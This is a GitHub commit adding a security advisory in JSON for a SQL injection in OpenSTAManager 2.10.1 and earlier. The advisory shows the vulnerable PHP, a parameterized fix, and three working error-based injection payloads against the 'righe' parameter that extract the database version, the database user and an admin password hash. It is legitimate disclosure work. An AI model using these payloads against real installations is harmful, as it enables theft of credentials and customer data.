Skip to content

Commit f8325f0

Browse files
advisory-database[bot]advisory-database[bot]
committed
1 parent 950d29d commit f8325f0

1 file changed

Lines changed: 64 additions & 0 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-mmm5-3g4x-qw39/GHSA-mmm5-3g4x-qw39.json

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mmm5-3g4x-qw39",
4+
"modified": "2026-04-03T21:57:08Z",
5+
"published": "2026-04-03T21:57:08Z",
6+
"aliases": [
7+
"CVE-2026-35470"
8+
],
9+
"summary": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals",
10+
"details": "## Description\n\nSix `confronta_righe.php` files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The `righe` parameter received via `$_GET['righe']` is directly concatenated into an SQL query without any sanitization, parameterization or validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.\n\n## Affected Files\n\nAll 6 vulnerable files share the same code pattern:\n\n| # | File | Line | Affected Table |\n|---|------|------|----------------|\n| 1 | `modules/fatture/modals/confronta_righe.php` | 29 | `co_righe_documenti` |\n| 2 | `modules/interventi/modals/confronta_righe.php` | 29 | `in_righe_interventi` |\n| 3 | `modules/preventivi/modals/confronta_righe.php` | 28 | `co_righe_preventivi` |\n| 4 | `modules/ordini/modals/confronta_righe.php` | 29 | `or_righe_ordini` |\n| 5 | `modules/ddt/modals/confronta_righe.php` | 29 | `dt_righe_ddt` |\n| 6 | `modules/contratti/modals/confronta_righe.php` | 28 | `co_righe_contratti` |\n\n## Vulnerable Code\n\nAll files follow the same pattern. Example from `modules/interventi/modals/confronta_righe.php`:\n\n```php\n$righe = $_GET['righe']; // Line 29 — No sanitization\n\n$righe = $dbo->fetchArray(\n 'SELECT\n `mg_articoli_lang`.`title`,\n `mg_articoli`.`codice`,\n `in_righe_interventi`.*\n FROM\n `in_righe_interventi`\n INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`\n LEFT JOIN `mg_articoli_lang` ON (...)\n WHERE\n `in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation\n);\n```\n\nThe value of `$_GET['righe']` is inserted directly into the SQL `IN()` clause without using `prepare()`, parameterized statements or any sanitization function.\n\n## Reproduction\n\n### Prerequisites\n\n- Authenticated session (any user with module access)\n- At least one existing record in the target module (e.g. an intervention with id=1)\n\n### Step 1: Extract MySQL version\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23\n```\n\n**Result:** `XPATH syntax error: '~8.3.0'`\n\n### Step 2: Extract database user\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23\n```\n\n**Result:** `XPATH syntax error: '~root@172.19.0.3'`\n\n### Step 3: Extract admin credentials\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23\n```\n\n**Result:** `XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'`\n\n### Evidence\n\n<img width=\"1254\" height=\"395\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429\" />\n\n\n### HTTP Request\n\n```http\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1\nHost: <TARGET>\nCookie: PHPSESSID=<SESSION_ID>\n```\n\n### Response (excerpt)\n\n```\nSQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'\n```\n\n## Impact\n\n- **Confidentiality (High):** Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information\n- **Integrity (High):** Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries\n- **Availability (High):** Deletion of tables or critical data, database corruption\n\n## Remediation\n\n### Recommended Fix\n\nUse parameterized statements with `prepare()` for the `righe` parameter:\n\n```php\n// BEFORE (vulnerable):\n$righe = $_GET['righe'];\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'\n);\n\n// AFTER (secure):\n$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));\n$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',\n $righe_ids\n);\n```\n\nThis fix must be applied to all **6 files** listed in the \"Affected Files\" section.\n\n## Credits\nOmar Ramirez",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "devcode-it/openstamanager"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.10.2"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.10.1"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/devcode-it/openstamanager"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-89"
58+
],
59+
"severity": "HIGH",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-04-03T21:57:08Z",
62+
"nvd_published_at": null
63+
}
64+
}

0 commit comments

Comments
 (0)